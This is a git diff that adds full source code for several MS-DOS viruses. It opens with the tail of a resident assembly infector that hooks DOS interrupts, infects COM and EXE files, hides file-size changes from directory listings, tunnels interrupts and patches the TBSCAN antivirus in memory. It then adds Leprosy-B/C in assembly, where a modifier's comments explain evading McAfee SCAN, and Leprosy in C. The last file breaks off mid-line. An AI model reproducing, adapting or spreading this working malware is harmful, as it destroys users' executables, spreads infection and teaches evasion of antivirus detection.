4,3,3,3,3,0 ;Table of extensions to infect +extension: db 'COM' + db 'com' + db 'EXE' + db 'exe' +stop_: +is_file_infectable endp + +stealth_a proc near ;Appears to be the same DIR + pushf ;stealth routines from NPOX + push cs + call skip_infect + test al,al + jnz no + + push ax + push bx + push es + mov ah,51h + int 21h + + mov es,bx + cmp bx,es:[16h] + jnz not_ + mov bx,dx + mov al,[bx] + push ax + mov ah,2fh + int 21h + pop ax + inc al + + jnz fcb_ok + add bx,7h +fcb_ok: mov ax,es:[bx+17h] + + and ax,01eh + xor al,01eh + jnz not_ + and byte ptr es:[bx+17h],0e0h + sub word ptr es:[bx+1dh],virus_size + sbb word ptr es:[bx+1fh],0 +not_: pop es + pop bx + pop ax +no: iret +stealth_a endp + +search_flag_b: + mov byte ptr cs:trace_flag,0 ;re-use to save memory + jmp dta_out + +stealth_b proc near + pushf + push cs + call skip_infect + jc search_flag_b + mov byte ptr cs:trace_flag,1 + push ax + push bx + push es + mov ah,2fh + int 21h + + mov ax,es:[bx+16h] + mov cx,es:[bx+18h] + and ax,1eh + xor ax,1eh + jnz dta_out1 + sub word ptr es:[bx+1ah],virus_size + sbb word ptr es:[bx+1ch],0 + +dta_out1: pop es + pop bx + pop ax +dta_out: retf 0002h + +stealth_b endp +stealth: jmp stealth_a + +critical_error_handler: + mov al,03h + iret + +int_21 proc near + cmp ah,011h + je stealth + cmp ah,012h + je stealth + cmp ah,04eh + je stealth_b + cmp ah,04fh + je stealth_b + cmp ah,04bh + je file_infect_step + cmp ah,06ch + je disinfect_step + cmp ah,03dh + je disinfect_step + cmp ah,03eh + je file_infect + cmp ah,04ch + je program_terminate_step + cmp ax,0fffeh ;test if active in memory + jne direct + mov bx,0ffffh + iret + + direct: jmp dword ptr cs:int_21_off + +program_terminate_step: + call program_terminate + jmp direct + +disinfect_step: jmp disinfect + +file_infect_step: + call anti_tbscan + jmp file_infect +int_21 endp + + + +get_filename_from_handle proc near + + push bx + mov ax,1220h + int 2fh + mov ax,1216h + mov bl,es:[di] + int 2fh + pop bx + add di,11h + mov byte ptr es:[di-0fh],02 + add di,17h + push di + pop dx + push es + pop ds + ret +get_filename_from_handle endp + +infect_OK proc near + + lea bx,extension_size + lea si,extension ;Test for EXE,COM,OVL + mov byte ptr cs:direction_flag,1 + call identify + jc error ;if not exe then error + + lea bx,avsize + lea si,avname ;Test for AV +tbscan_test: + mov byte ptr cs:direction_flag,0 + call identify + jnc error ;If no AV then good! + +no_error: + clc + ret + +error: stc + ret + +infect_ok endp + +no_good: + jmp exe + +file_infect proc + cmp bl,4 + ja handle_ok + cmp ah,4bh ;determine if file open or + je handle_ok ;file execute + jmp skip_infect +handle_ok: + push ax + push bx + push es + push bx + push cx + push dx + push ds + push di + push si + + call set_critical_error_handler + cmp ah,4bh + jne only_handle_supplied + + call open_file ;open file if call = ah=4b + jc no_good + cmp bl,5 + jb no_good + mov byte ptr cs:execute_flag,1 + + push bx + mov byte ptr cs:no_scasb_flag,0 + call infect_ok + pop bx + jnc skip_flag_check + jmp dont_infect_here + +only_handle_supplied: + + mov byte ptr cs:execute_flag,0 ;if flag ==1 then close + call get_filename_from_handle + + + push bx + mov byte ptr cs:no_scasb_flag,1 + call infect_ok + pop bx + + jnc good + jmp dont_infect_here + +skip_flag_check: + +good: call get_date + push dx + push cx + mov word ptr cs:old_date,dx + mov word ptr cs:old_time,cx + call is_file_infected + jc do_it + jmp loc_15 + +do_it: call set_offset_start + push cs + pop ds + lea dx,buffer + mov cx,18h + call read_file + push cx + + cld + push cs + pop es + lea si,buffer + lea di,buffer1 + mov cx,18h + rep movsb ;Save header for stealth + pop cx ;disinfect on open + cmp word ptr cs:[buffer1+0ch],1 ;Dont infect if number of + jb exe ;paragraps required after load + xor dx,dx ;is less than 1 + call set_offset_e + cmp dx,0 + ja big_enough + cmp ax,0fff0h-virus_siz + ja exe + +big_enough: + cmp dx,4 + ja exe + cmp byte ptr ds:[buffer],4Dh ; 'M' ; is file exe? + je file_is_exe ; Jump if equal; + jmp file_is_com +exe: + jmp loc_15 + +file_is_exe: ;Recalculate new EXE Header + push bx + mov cl,4 + mov bx,word ptr [buffer+8] + shl bx,cl + push dx ax + sub ax,bx + sbb dx,0 + mov bx,10h + div bx + mov word ptr [buffer+14h],dx + mov word ptr [buffer+16h],ax + add ax,virus_size/16 + mov word ptr [buffer+0eh],ax + pop ax dx + add ax,virus_size + adc dx,0 + mov bx,512 + div bx + pop bx + inc ax + mov word ptr [buffer+4],ax + mov word ptr [buffer+2],dx + mov cx,18h + lea dx,buffer + push dx + push cx + jmp short loc_14 + +File_Is_Com: + sub ax,3 + mov word ptr cs:[com_header_offset],ax + mov cx,3 ;header size in bytes + lea dx,com_header + push dx + push cx +loc_14: + + call write_virus ;write and encrypt virus + call set_offset_start + pop cx + pop dx + call write_bytes + pop cx + or cl,01eh + push cx + +loc_15: + pop cx + pop dx + call write_date + +dont_infect_here: + cmp byte ptr cs:execute_flag,1 + jne dont_close + mov ah,3eh + call dos +dont_close: + call restore_critical_error_handler + pop si + pop di + pop ds + pop dx + pop cx + pop bx + pop es + pop bx + pop ax + +skip_infect: + jmp dword ptr cs:int_21_off + +execute_flag db 0 + +file_infect endp + +disinfect proc near + pusha + push ds es + cmp ah,06ch ;adjust ds:si to ds:dx if + jne not_extended ;ah == extended file open(6c) + push si + pop dx +not_extended: + mov byte ptr cs:no_scasb_flag,0 + call infect_ok + jc skip_disinfect + call set_critical_error_handler + call open_file + jc skip_disinfect ;Skip disinfection on error + push cs + pop ds + + call get_date ;Get file date + call is_file_infected ;Is the seconds field 60? + jne dont_disinfect ;If not, then quit + xor dx,dx + call set_offset_e ;get infected file size + push dx ;save + push ax + sub ax,1ch ;sub buffer size from end + sbb dx,0 + mov cx,dx ;set new pointer to buffer + mov dx,ax + call no_xor + lea dx,old_date + mov cx,1ch ;buffer = 18h + 4 for date = 1c + call read_file ;read into buffer + call set_offset_start ;Restore original header + mov cx,18h + lea dx,buffer1 + call write_bytes ;write at start + pop dx + pop cx + sub dx,virus_size + sbb cx,0 + call no_xor ;set offset from start + mov ah,40h + xor cx,cx + call dos ;truncate + mov cx,old_time + mov dx,old_date + call write_date ;Restore original date and time + cmp trace_flag,0 + je dont_disinfect + call reset_dta ;Adjust seconds field in DTA +dont_disinfect: + mov ah,3eh ;Close file + call dos + call restore_critical_error_handler +skip_disinfect: + pop es ds + popa + jmp dword ptr cs:int_21_off + +disinfect endp + +reset_dta proc near + push ax bx es + mov ah,2fh ;Get current DTA + call dos ;DTA pointed to by es:bx + mov ax,word ptr cs:old_time ;Get old time and + mov word ptr es:[bx+16h],ax ;save in DTA + pop es bx ax + ret +reset_dta endp + +get_date proc near + mov ax,5700h + call dos + ret +get_date endp + +write_date proc near + mov ax,5701h + call dos + ret +write_date endp + +is_file_infected proc near + and cl,01eh ;Unmask seconds + cmp cl,01eh + ret +is_file_infected endp + +com_header proc + db 0e9h ;JMP +com_header_offset dw 0000 +com_header endp + + +set_offset_start proc + xor cx,cx + xor dx,dx +no_xor: mov ax,4200h + call dos + ret + +set_offset_e: + xor cx,cx + mov ax,4202h + call dos + ret +read_file: + mov ah,3fh + call dos + ret +write_bytes: + mov ah,40h + call dos + ret + +write_virus: + xor ax,ax + out 70h,al + in ax,70h ;Get seconds from computer + cmp ah,0 ;If seconds = 0 then + jne dont_mask ;set to 12 + mov ah,12 + +dont_mask: + cmp ah,21h ;??? + jne dont_mask1 + mov ah,15h + +dont_mask1: + mov byte ptr cs:key-1,ah ;Save key in virus decryptor + lea si,start ;move to preallocated memory for + lea di,vir_end ;encryption + inc di + mov cx,virus_size + cld + rep movsb ;Copy uninfected verson to + ;encryption area + mov cx,decrypt_size + lea si,vir_end ;load si with virus and address + inc si ;inc to virus image to encrypt + add si,engine_size ;add 16h bytes so as not to +encrypt: ;encrypt virus engine + xor [si],ah + inc si + loop encrypt ;Encrypt + + mov ah,40h + mov cx,virus_size + lea dx,vir_end + inc dx + call dos + ret +set_offset_start endp + +dos proc near + Pushf ;Save flags for DOS IRET + call dword ptr cs:int_21_off_o ;original dos entry + ret +dos endp + +open_file proc near + push ax + mov ax,3d02h + call dos + push ax + pop bx ax ;Put handle into BX + ret +open_file endp + +set_critical_error_handler proc near + push ax bx dx es ds + push cs + pop ds + mov ax,3524h + call dos + mov critical_error_seg,es + mov critical_error_off,bx + lea dx,critical_error_handler + mov ax,2524h + call dos + pop ds es dx bx ax + ret +set_critical_error_handler endp + +critical_error_off dw ? +critical_error_seg dw ? + +restore_critical_error_handler proc near + mov ax,2524h + lds dx,dword ptr cs:critical_error_off + call dos + ret +restore_critical_error_handler endp + + +int_trace proc near + mov ax,3501h ;get trace interrupt + int 21h + mov di,es ;save seg and offset in di, si + mov si,bx + + mov ax,2501h + lea dx,word ptr cs:int_01[bp] ;point trace to our segment + int 21h + pushf + push cs + lea ax,word ptr cs:exit_trace[bp] ;set up for after trace + push ax + + cli + pushf + pop ax + or ax,100h ;switch trace flag on + push ax ;save flags + + mov ax,word ptr cs:int_21_seg[bp] + push ax ;save seg + mov ax,word ptr cs:int_21_off[bp] + push ax ;save offset + mov ax,351ch ;get INT 1c address + mov byte ptr cs:trace_flag[bp],1 + mov bx,bp + iret +exit_trace: + mov byte ptr cs:trace_flag[bp],0 ;turn of our trace flag + sti ;restore interrupts + mov ax,2501h ;restore original INT 01 + mov dx,si ;Vectors + mov ds,di + int 21h + ret ;Done +int_01: + push bp + mov bx,bp + mov bp,sp + cmp byte ptr cs:trace_flag[bx],1 + je tunnel_dos +tunnel: + and word ptr [bp+6],0feffh + mov byte ptr cs:trace_flag[bx],0 + pop bp + iret +tunnel_dos: + cmp word ptr [bp+4],300h ;Are we in the DOS SEG? + jb save_vector + pop bp + iret + +save_vector: + push cx + mov cx,[bp+2] + mov cs:int_21_off_o[bx],cx ;Delta offsets are used + mov cx,[bp+4] + mov cs:int_21_seg_o[bx],cx + pop cx + jmp tunnel + +int_trace endp + +program_terminate proc near + cmp byte ptr cs:tbexecute_flag,0 + je tbscan_exit + mov byte ptr cs:tbexecute_flag,0 ;Turn off tbscan execute + mov byte ptr cs:done_flag,0 ;flag + call unhook_1c ;Restore int 1C +tbscan_exit: + ret +program_terminate endp + +hook_int1c proc near + pusha + push es ds + mov ax,0351ch + call dos + mov int_1c_off,bx + mov bx,es + mov int_1c_seg,bx + lea dx,int1c + mov ah,025h + call dos + mov tbexecute_flag,1 + pop ds es + popa + ret +hook_int1c endp + +int1c proc near + cmp byte ptr cs:done_flag,1 + je exit_1c + cmp byte ptr cs:tbexecute_flag,1 + jne exit_1c + call convert_tbscan ;Patch TBSCAN with 'OWN' +exit_1c: + jmp dword ptr cs:int_1c_off +int1c endp + +unhook_1c proc near + pusha + push es ds cs + pop ax ;ax= code seg + xor bx,bx + mov es,bx ;es= 0000h + push es + mov bx,word ptr es:timer_seg + mov es,bx + cmp bx,ax + jne dont_unhook + mov ax,word ptr cs:int_1c_seg + mov bx,word ptr cs:int_1c_off + pop es + cli + mov word ptr es:timer_seg,ax + mov word ptr es:timer_seg-2,bx + sti +dont_unhook: + pop ds es + popa + ret +unhook_1c endp + +convert_tbscan proc near + pusha + push es ds cs + pop ax + xor bx,bx + mov es,bx + mov bx,word ptr es:timer_seg ;Trace through INT 1c which is + mov di,word ptr es:timer_seg-2 ;hooked by TBSCAN + mov es,bx + cmp bx,ax + je exit_convert + xor ax,ax + lea si,replace + push cs + pop ds +next_char2: + inc ax + mov cx,8 + push si + rep cmpsb ;search for string 'DOS','OWN' + pop si ;within TBSCAN while it is in + je found_dos ;memory doing it's thing. + cmp ax,0fffeh + je exit_convert + jmp next_char2 + +found_DOS: + push es + pop ds + sub di,8 + mov si,di + add si,4 + mov cx,3 + rep movsb + mov byte ptr cs:done_flag,1 +exit_convert: + pop ds es + popa + ret + + ; Search Data +replace db 'DOS',0,'OWN',0 +done_flag db 0 +convert_tbscan endp + +Getcpu proc near ;Test CPU Type + Pushf + Pop AX + Push AX + And AX,0FFFh + Push AX + Popf + Pushf + Pop AX + pop BX + And AX,0F000h + Cmp AX,0F000h + ret +getcpu endp + + +HANDLE: + +step1: +data proc near + db '=!Packed file is corruptœ' + buffer db 17h dup(?) ;Modified EXE and Com header + db 90h + tbexecute_flag db 0 + trace_flag db ? ;Used for tunneling + int_01_off dw ? + int_01_seg dw ? + int_1c_off dw ? + int_1c_seg dw ? + int_21_off_o dw ? ;Original INT 21 + int_21_seg_o dw ? + int_21_off dw ? ;Chained INT 21 + int_21_seg dw ? + new_seg dw ? + old_date dw ? + old_time dw ? + buffer1 db 90h ;Original file header for + mov ax,4c00h ;Com and Exe files + int 21h + db 11h dup(?) + db 90h + +data endp + +vir_end: +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.lepc.asm b/MSDOS/Virus.MSDOS.Unknown.lepc.asm new file mode 100644 index 00000000..f23db2a8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lepc.asm @@ -0,0 +1,297 @@ +; - Leprosy-B Virus Source +; Copy-ya-right (c) 1990 by PCM2. +; +; This file is the source code to the Leprosy-B virus. It should +; be assembled with an MASM-compatible assembler; it has been tested +; and assembles correctly with both MASM 4.0 and Turbo Assembler 1.0. +; It should be made into a .COM file before executing, with either +; the "/t" command line flag in TLINK or Microsoft's EXE2BIN utility. +; +; This program has the potential to permanently destroy executable +; images on any disk medium. Other modifications may have been made +; subsequent to the original release by the author, either benign, +; or which could result in further harm should this program be run. +; In any case, the author assumes no responsibility for any damage +; caused by this program, incidental or otherwise. As a precaution, +; this program should not be turned over to irresponsible hands... +; (unlike people like us, that is). +; +;;-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=- +;; +;; - This virus is not really Leprosy-B. It is, in +;; fact, ALMOST the same. When I encountered the +;; source code and assembled it, I found, obviously +;; to my disappointment, that SCAN v77 could find +;; it. Since it is a self-encrypting virus, I knew +;; EXACTLY how to fix this problem (after all, +;; being part of McPhee's programs is a sure way to +;; know that your virus has been a big hit, but it +;; also means that it will soon meet a terrible end. +;; Presented with such a sad situation, I decided I +;; would modify the virus to give it one more shot +;; at the outside world. Not only that, but I will +;; make TWO new versions. This one, in particular, +;; will preserve the traditional length of 666, and +;; will only have a slight modification. You see, +;; since the virus encrypts itself, McPhee must go +;; on 1 or both of two paths. He must either use +;; the whole non-encrypted portion as an ID string, +;; or he must use the file offset where the value +;; for decrypting is normally stored, XOR it with +;; the rest of the program (this is how it encrypts +;; and decrypts itself), and then try to identify +;; the decrypted code as the virus. By changing +;; where the encryption value is stored in the non- +;; encrypted portion and putting a zero there in- +;; stead, (along with altering the primary instruc- +;; tions slightly), I have made it undetectable by +;; SCAN, despite the fact that it is (in all other +;; aspects) the same damn thing. +;; Have fun! +;; The BOOT SECTOR Infector... +;; +;; NOTE: Also, (in case you haven't already noticed) all of the changes +;; I make to this program will have a double semicolon (;;) on +;; them somewhere. This is to reinforce the fact that I DID +;; NOT do the original work on this virus. That credit is left +;; appropriately to PCM2. And I respect his brilliance in its +;; coding (especially the encrypt/decrypt portion!) +;; L8r peepz! +;; + + + + title "Leprosy-C Virus by PCM2, August 1990" +;; With additional modifications by TBSI, June 1991 + + +cr equ 13 ; Carriage return ASCII code +lf equ 10 ; Linefeed ASCII code +tab equ 9 ; Tab ASCII code +virus_size equ 666 ; Size of the virus file +code_start equ 100h ; Address right after PSP in memory +dta equ 80h ; Addr of default disk transfer area +datestamp equ 24 ; Offset in DTA of file's date stamp +timestamp equ 22 ; Offset in DTA of file's time stamp +filename equ 30 ; Offset in DTA of ASCIIZ filename +attribute equ 21 ; Offset in DTA of file attribute + + + code segment 'code' ; Open code segment + assume cs:code,ds:code ; One segment for both code & data + org code_start ; Start code image after PSP + +;--------------------------------------------------------------------- +; All executable code is contained in boundaries of procedure "main". +; The following code, until the start of "virus_code", is the non- +; encrypted CMT portion of the code to load up the real program. +;--------------------------------------------------------------------- +main proc near ; Code execution begins here + call encrypt_decrypt ; Decrypt the real virus code + jmp random_mutation ; Put the virus into action + db 0 ;; This line inserted by TBSI. If + ;; McPhee uses the second technique + ;; described in my speech, then it + ;; will find the zero and consider + ;; it to be the value it wants, even + ;; though using a zero will make it + ;; do absolutely NOTHING! +encrypt_val db 00h ; Hold value to encrypt by here + +; ---------- Encrypt, save, and restore the virus code ----------- +infect_file: + mov bx,handle ; Get the handle + push bx ; Save it on the stack + call encrypt_decrypt ; Encrypt most of the code + pop bx ; Get back the handle + nop ;; Added by TBSI to through of McPhee + mov cx,virus_size ; Total number of bytes to write + mov dx,code_start ; Buffer where code starts in memory + mov ah,40h ; DOS write-to-handle service + int 21h ; Write the virus code into the file + call encrypt_decrypt ; Restore the code as it was + ret ; Go back to where you came from + +; --------------- Encrypt or decrypt the virus code ---------------- +encrypt_decrypt: + mov bx,offset virus_code ; Get address to start encrypt/decrypt +xor_loop: ; Start cycle here + mov ah,[bx] ; Get the current byte + xor ah,encrypt_val ; Engage/disengage XOR scheme on it + mov [bx],ah ; Put it back where we got it + inc bx ; Move BX ahead a byte + nop ;; Added by TBSI to through of McPhee + cmp bx,offset virus_code+virus_size ; Are we at the end? + jle xor_loop ; If not, do another cycle + ret ; and go back where we came from + +;----------------------------------------------------------------------- +; The rest of the code from here on remains encrypted until run-time, +; using a fundamental XOR technique that changes via CMT. +;----------------------------------------------------------------------- +virus_code: + +;---------------------------------------------------------------------------- +; All strings are kept here in the file, and automatically encrypted. +; Please don't be a lamer and change the strings and say you wrote a virus. +; Because of Cybernetic Mutation Technology(tm), the CRC of this file often +; changes, even when the strings stay the same. +;---------------------------------------------------------------------------- +exe_filespec db "*.EXE",0 +com_filespec db "*.COM",0 +newdir db "..",0 +fake_msg db cr,lf,"Program too big to fit in memory$" +virus_msg1 db cr,lf,tab,"ATTENTION! Your computer has been afflicted with$" +virus_msg2 db cr,lf,tab,"the incurable decay that is the fate wrought by$" +virus_msg3 db cr,lf,tab,"Leprosy Strain B, a virus employing Cybernetic$" +virus_msg4 db cr,lf,tab,"Mutation Technology(tm) and invented by PCM2 08/90.$" +compare_buf db 20 dup (?) ; Buffer to compare files in +files_found db ? +files_infected db ? +orig_time dw ? +orig_date dw ? +orig_attr dw ? +handle dw ? +success db ? + +random_mutation: ; First decide if virus is to mutate + mov ah,2ch ; Set up DOS function to get time + int 21h + cmp encrypt_val,0 ; Is this a first-run virus copy? + je install_val ; If so, install whatever you get. + cmp dh,15 ; Is it less than 16 seconds? + jg find_extension ; If not, don't mutate this time +install_val: + cmp dl,0 ; Will we be encrypting using zero? + je random_mutation ; If so, get a new value. + mov encrypt_val,dl ; Otherwise, save the new value +find_extension: ; Locate file w/ valid extension + mov files_found,0 ; Count infected files found + mov files_infected,4 ; BX counts file infected so far + mov success,0 +find_exe: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset exe_filespec ; Check for .EXE extension first + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je find_com ; If not, nothing more to do + call find_healthy ; Otherwise, try to find healthy .EXE +find_com: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset com_filespec ; Check for .COM extension now + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je chdir ; If not, step back a directory + call find_healthy ; Otherwise, try to find healthy .COM +chdir: ; Routine to step back one level + mov dx,offset newdir ; Load DX with address of pathname + mov ah,3bh ; Change directory DOS service + int 21h + dec files_infected ; This counts as infecting a file + jnz find_exe ; If we're still rolling, find another + jmp exit_virus ; Otherwise let's pack it up +find_healthy: + mov bx,dta ; Point BX to address of DTA + mov ax,[bx]+attribute ; Get the current file's attribute + mov orig_attr,ax ; Save it + mov ax,[bx]+timestamp ; Get the current file's time stamp + mov orig_time,ax ; Save it + mov ax,[bx]+datestamp ; Get the current file's data stamp + mov orig_date,ax ; Save it + mov dx,dta+filename ; Get the filename to change attribute + mov cx,0 ; Clear all attribute bytes + mov al,1 ; Set attribute sub-function + mov ah,43h ; Call DOS service to do it + int 21h + mov al,2 ; Set up to open handle for read/write + mov ah,3dh ; Open file handle DOS service + int 21h + mov handle,ax ; Save the file handle + mov bx,ax ; Transfer the handle to BX for read + mov cx,20 ; Read in the top 20 bytes of file + mov dx,offset compare_buf ; Use the small buffer up top + mov ah,3fh ; DOS read-from-handle service + int 21h + mov bx,offset compare_buf ; Adjust the encryption value + mov ah,encrypt_val ; for accurate comparison + mov [bx+6],ah + mov si,code_start ; One array to compare is this file + mov di,offset compare_buf ; The other array is the buffer + mov ax,ds ; Transfer the DS register... + mov es,ax ; ...to the ES register + cld + repe cmpsb ; Compare the buffer to the virus + jne healthy ; If different, the file is healthy! + call close_file ; Close it up otherwise + inc files_found ; Chalk up another fucked up file +continue_search: + mov ah,4fh ; Find next DOS function + int 21h ; Try to find another same type file + cmp ax,12h ; Are there any more files? + je no_more_found ; If not, get outta here + jmp find_healthy ; If so, try the process on this one! +no_more_found: + ret ; Go back to where we came from +healthy: + mov bx,handle ; Get the file handle + mov ah,3eh ; Close it for now + int 21h + mov ah,3dh ; Open it again, to reset it + mov dx,dta+filename + mov al,2 + int 21h + mov handle,ax ; Save the handle again + call infect_file ; Infect the healthy file + call close_file ; Close down this operation + inc success ; Indicate we did something this time + dec files_infected ; Scratch off another file on agenda + jz exit_virus ; If we're through, terminate + jmp continue_search ; Otherwise, try another + ret +close_file: + mov bx,handle ; Get the file handle off the stack + mov cx,orig_time ; Get the date stamp + mov dx,orig_date ; Get the time stamp + mov al,1 ; Set file date/time sub-service + mov ah,57h ; Get/Set file date and time service + int 21h ; Call DOS + mov bx,handle + mov ah,3eh ; Close handle DOS service + int 21h + mov cx,orig_attr ; Get the file's original attribute + mov al,1 ; Instruct DOS to put it back there + mov dx,dta+filename ; Feed it the filename + mov ah,43h ; Call DOS + int 21h + ret +exit_virus: + cmp files_found,6 ; Are at least 6 files infected? + jl print_fake ; If not, keep a low profile + cmp success,0 ; Did we infect anything? + jg print_fake ; If so, cover it up + mov ah,09h ; Use DOS print string service + mov dx,offset virus_msg1 ; Load the address of the first line + int 21h ; Print it + mov dx,offset virus_msg2 ; Load the second line + int 21h ; (etc) + mov dx,offset virus_msg3 + int 21h + mov dx,offset virus_msg4 + int 21h + jmp terminate +print_fake: + mov ah,09h ; Use DOS to print fake error message + mov dx,offset fake_msg + int 21h +terminate: + mov ah,4ch ; DOS terminate process function + int 21h ; Call DOS to get out of this program + +filler db 8 dup (90h) ; Pad out the file length to 666 bytes + +main endp +code ends + end main + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.leprosy-c.asm b/MSDOS/Virus.MSDOS.Unknown.leprosy-c.asm new file mode 100644 index 00000000..5f59a833 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.leprosy-c.asm @@ -0,0 +1,217 @@ +/* This file is part of the source code to the LEPROSY Virus 1.00 + Copy-ya-right (c) 1990 by PCM2. This program can cause destruction + of files; you're warned, the author assumes no responsibility + for damage this program causes, incidental or otherwise. This + program is not intended for general distribution -- irresponsible + users should not be allowed access to this program, or its + accompanying files. (Unlike people like us, of course...) +*/ + + +#pragma inline + +#define CRLF "\x17\x14" /* CR/LF combo encrypted. */ +#define NO_MATCH 0x12 /* No match in wildcard search. */ + + +/* The following strings are not garbled; they are all encrypted */ +/* using the simple technique of adding the integer value 10 to */ +/* each character. They are automatically decrypted by */ +/* 'print_s()', the function which sends the strings to 'stdout' */ +/* using DOS service 09H. All are terminated with a dollar-sign */ +/* "$" as per DOS service specifications. */ + +char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83."; +char *virus_msg[3] = + { + CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.", + CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.", + CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14." + }; + + + +struct _dta /* Disk Transfer Area format for find. */ + { + char findnext[21]; + char attribute; + int timestamp; + int datestamp; + long filesize; + char filename[13]; + } *dta = (struct _dta *) 0x80; /* Set it to default DTA. */ + + +const char filler[] = "XX"; /* Pad file length to 666 bytes. */ +const char *codestart = (char *) 0x100; /* Memory where virus code begins. */ +const int virus_size = 666; /* The size in bytes of the virus code. */ +const int infection_rate = 4; /* How many files to infect per run. */ + +char compare_buf[20]; /* Load program here to test infection. */ +int handle; /* The current file handle being used. */ +int datestamp, timestamp; /* Store original date and time here. */ +char diseased_count = 0; /* How many infected files found so far. */ +char success = 0; /* How many infected this run. */ + + +/* The following are function prototypes, in keeping with ANSI */ +/* Standard C, for the support functions of this program. */ + +int find_first( char *fn ); +int find_healthy( void ); +int find_next( void ); +int healthy( void ); +void infect( void ); +void close_handle( void ); +void open_handle( char *fn ); +void print_s( char *s ); +void restore_timestamp( void ); + + + +/*----------------------------------*/ +/* M A I N P R O G R A M */ +/*----------------------------------*/ + +int main( void ) { + int x = 0; + do { + if ( find_healthy() ) { /* Is there an un-infected file? */ + infect(); /* Well, then infect it! */ + x++; /* Add one to the counter. */ + success++; /* Carve a notch in our belt. */ + } + else { /* If there ain't a file here... */ + _DX = (int) ".."; /* See if we can step back to */ + _AH = 0x3b; /* the parent directory, and try */ + asm int 21H; /* there. */ + x++; /* Increment the counter anyway, to */ + } /* avoid infinite loops. */ + } while( x < infection_rate ); /* Do this until we've had enough. */ + if ( success ) /* If we got something this time, */ + print_s( fake_msg ); /* feed 'em the phony error line. */ + else + if ( diseased_count > 6 ) /* If we found 6+ infected files */ + for( x = 0; x < 3; x++ ) /* along the way, laugh!! */ + print_s( virus_msg[x] ); + else + print_s( fake_msg ); /* Otherwise, keep a low profile. */ + return; +} + + +void infect( void ) { + _DX = (int) dta->filename; /* DX register points to filename. */ + _CX = 0x00; /* No attribute flags are set. */ + _AL = 0x01; /* Use Set Attribute sub-function. */ + _AH = 0x43; /* Assure access to write file. */ + asm int 21H; /* Call DOS interrupt. */ + open_handle( dta->filename ); /* Re-open the healthy file. */ + _BX = handle; /* BX register holds handle. */ + _CX = virus_size; /* Number of bytes to write. */ + _DX = (int) codestart; /* Write program code. */ + _AH = 0x40; /* Set up and call DOS. */ + asm int 21H; + restore_timestamp(); /* Keep original date & time. */ + close_handle(); /* Close file. */ + return; +} + + +int find_healthy( void ) { + if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */ + if ( healthy() ) /* If it's healthy, OK! */ + return 1; + else + while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ + if ( healthy() ) + return 1; /* If you find one, great! */ + if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */ + if ( healthy() ) /* If it's healthy, OK! */ + return 1; + else + while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ + if ( healthy() ) + return 1; /* If you find one, great! */ + return 0; /* Otherwise, say so. */ +} + + + +int healthy( void ) { + int i; + datestamp = dta->datestamp; /* Save time & date for later. */ + timestamp = dta->timestamp; + open_handle( dta->filename ); /* Open last file located. */ + _BX = handle; /* BX holds current file handle. */ + _CX = 20; /* We only want a few bytes. */ + _DX = (int) compare_buf; /* DX points to the scratch buffer. */ + _AH = 0x3f; /* Read in file for comparison. */ + asm int 21H; + restore_timestamp(); /* Keep original date & time. */ + close_handle(); /* Close the file. */ + for ( i = 0; i < 20; i++ ) /* Compare to virus code. */ + if ( compare_buf[i] != *(codestart+i) ) + return 1; /* If no match, return healthy. */ + diseased_count++; /* Chalk up one more fucked file. */ + return 0; /* Otherwise, return infected. */ +} + + +void restore_timestamp( void ) { + _AL = 0x01; /* Keep original date & time. */ + _BX = handle; /* Same file handle. */ + _CX = timestamp; /* Get time & date from DTA. */ + _DX = datestamp; + _AH = 0x57; /* Do DOS service. */ + asm int 21H; + return; +} + + +void print_s( char *s ) { + char *p = s; + while ( *p ) { /* Subtract 10 from every character. */ + *p -= 10; + p++; + } + _DX = (int) s; /* Set DX to point to adjusted string. */ + _AH = 0x09; /* Set DOS function number. */ + asm int 21H; /* Call DOS interrupt. */ + return; +} + + +int find_first( char *fn ) { + _DX = (int) fn; /* Point DX to the file name. */ + _CX = 0xff; /* Search for all attributes. */ + _AH = 0x4e; /* 'Find first' DOS service. */ + asm int 21H; /* Go, DOS, go. */ + return _AX; /* Return possible error code. */ +} + + +int find_next( void ) { + _AH = 0x4f; /* 'Find next' function. */ + asm int 21H; /* Call DOS. */ + return _AX; /* Return any error code. */ +} + + +void open_handle( char *fn ) { + _DX = (int) fn; /* Point DX to the filename. */ + _AL = 0x02; /* Always open for both read & write. */ + _AH = 0x3d; /* "Open handle" service. */ + asm int 21H; /* Call DOS. */ + handle = _AX; /* Assume handle returned OK. */ + return; +} + + +void close_handle( void ) { + _BX = handle; /* Load BX register w/current file handle. */ + _AH = 0x3e; /* Set up and call DOS service. */ + asm int 21H; + return; +} + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.leprosy.c b/MSDOS/Virus.MSDOS.Unknown.leprosy.c new file mode 100644 index 00000000..cbe7abd6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.leprosy.c @@ -0,0 +1,216 @@ +/* This file is part of the source code to the LEPROSY Virus 1.00 + Copy-ya-right (c) 1990 by PCM2. This program can cause destruction + of files; you're warned, the author assumes no responsibility + for damage this program causes, incidental or otherwise. This + program is not intended for general distribution -- irresponsible + users should not be allowed access to this program, or its + accompanying files. (Unlike people like us, of course...) +*/ + + +#pragma inline + +#define CRLF "\x17\x14" /* 